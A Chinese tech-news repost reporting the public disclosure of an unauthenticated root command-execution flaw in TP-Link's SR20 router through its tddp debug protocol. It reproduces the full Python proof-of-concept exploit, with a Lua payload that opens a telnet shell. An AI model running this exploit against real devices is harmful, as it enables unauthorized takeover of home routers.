本文作者:转载砖家

TP-Link没有响应,安全工程师透露了他们的路由器漏洞

转载砖家 3个月前 ( 03-31 ) 359 抢沙发
摘要: 此前,Google安全工程师在TP-Link的SR20智能家居路由器上发现了一个漏洞,该漏洞允许从本地网络连接执行任意命令。他们向TP-Link报告了这个问题,但在90天之后,他们...

此前,Google安全工程师在TP-Link的SR20智能家居路由器上发现了一个漏洞,该漏洞允许从本地网络连接执行任意命令。他们向TP-Link报告了这个问题,但在90天之后,他们没有得到官方回复。他透露了这个漏洞。

TP-Link没有响应,安全工程师透露了他们的路由器漏洞 路由 安全工程师 tp-link socket 漏洞 百度资讯 站长经验 互联网 互联网资讯 科技新闻 新鲜科技 第1张

知名谷歌安全工程师和开源贡献者Matthew Garrett透露了这个问题,他的38行概念证明代码周三透露,他可以使用root权限在设备上执行任何命令而无需身份验证。

TP-Link没有响应,安全工程师透露了他们的路由器漏洞 路由 安全工程师 tp-link socket 漏洞 百度资讯 站长经验 互联网 互联网资讯 科技新闻 新鲜科技 第2张

Matthew解释说TP-Link路由器经常以root身份运行名为“tddp”(TP-Link设备调试协议)的进程。它已经存在多个漏洞,其中一个漏洞未经过身份验证。

“SR20暴露了第一版协议的一些命令,其中一个命令(命令0x1f,请求0x01)似乎用于某种配置验证”,他说:“你收到命令后发送文件和相应的参数,路由器通过TFTP响应请求机器,请求输入文件名,将其导入Lua解释器,以root身份运行,并将参数发送到导入文件中的config_test()函数.Lua os.execute()方法通过操作系统shell传递执行

由于解释器以 root 身份运行,所以可以执行任意命令。

  1. #!/usr/bin/python3


  2. # Create /testfile in your tftp root directory with the following contents:

  3. #

  4. #function config_test(config)

  5. #  os.execute("telnetd -l /bin/login.sh")

  6. #end

  7. #

  8. # Replace 192.168.0.1 with the IP address of the vulnerable device


  9. import binascii

  10. import socket


  11. port_send = 1040

  12. port_receive = 61000


  13. tddp_ver = "01"

  14. tddp_command = "31"

  15. tddp_req = "01"

  16. tddp_reply = "00"

  17. tddp_padding = "%0.16X" % 00


  18. tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])


  19. sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

  20. sock_receive.bind(('', port_receive))


  21. # Send a request

  22. sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

  23. packet = binascii.unhexlify(tddp_packet)

  24. packet = packet + b"/testfile;arbitrary"

  25. print(packet)

  26. sock_send.sendto(packet, ("192.168.0.1", port_send))

  27. sock_send.close()


  28. response, addr = sock_receive.recvfrom(1024)

  29. r = response.encode('hex')

  30. print(r)


推荐阅读:

中国移动:流量资费将降低20%,以确保“便携式号码转移网络”尽快实施。

如何创造一个并且带来优质的能带来流量的企业网站

支付宝码商狂欢节领支付宝现金红包轻松撸几十 每日可参与

文章投稿或转载声明:

来源:里维斯社版权归原作者所有,转载请保留出处。本站文章发布于 3个月前 ( 03-31 )
温馨提示:文章内容系作者个人观点,不代表我爱技术网对其观点赞同或支持。

赞(0

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

发表评论

快捷回复:

评论列表 (暂无评论,359人围观)参与讨论

还没有评论,来说两句吧...